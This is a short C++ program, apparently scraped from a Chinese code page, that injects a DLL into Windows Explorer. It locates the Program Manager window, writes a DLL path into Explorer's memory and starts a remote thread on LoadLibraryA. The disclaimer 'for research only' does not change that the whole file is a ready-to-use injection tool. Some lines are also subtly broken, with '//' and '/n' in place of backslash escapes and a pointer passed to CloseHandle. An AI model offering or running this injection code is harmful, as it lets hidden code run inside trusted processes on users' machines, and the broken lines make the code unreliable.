1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 | //Dll注入系统,注入的文件名为Dll.dll; //本文仅供研究不得用于非法用途,后果自负 // RemoteThreadDll.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <stdlib.h> #include <windows.h> int main( int argc, char * argv[]) { HWND hand; HANDLE hProcess; HMODULE hmod; char szMyDllFull[256]; DWORD dwThreadID=NULL,dwProcessID=NULL ; PDWORD lpLoadLibrary,lpDllName; GetCurrentDirectory(MAX_PATH,szMyDllFull); lstrcat(szMyDllFull, "//Dll.dll" ); printf ( "%s/n" ,szMyDllFull); hmod=GetModuleHandle( "kernel32.dll" ); lpLoadLibrary=(PDWORD)GetProcAddress(hmod, "LoadLibraryA" ); hand=FindWindow( "Progman" , "Program Manager" ); if (hand==NULL) { printf ( "找不到 progarm manager/n" ); return 0; } dwThreadID=GetWindowThreadProcessId(hand,&dwProcessID); hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwProcessID); if (hProcess!=NULL) { lpDllName=(PDWORD)VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE); printf ( "%x/n" ,lpDllName); WriteProcessMemory(hProcess,lpDllName,szMyDllFull,MAX_PATH,NULL); CreateRemoteThread(hProcess,NULL,0, (LPTHREAD_START_ROUTINE )lpLoadLibrary,lpDllName,0,NULL); CloseHandle(lpDllName); CloseHandle(hProcess); //ExitProcess(NULL); } else printf ( "faile/n" ); return 0; } </windows.h></stdlib.h> |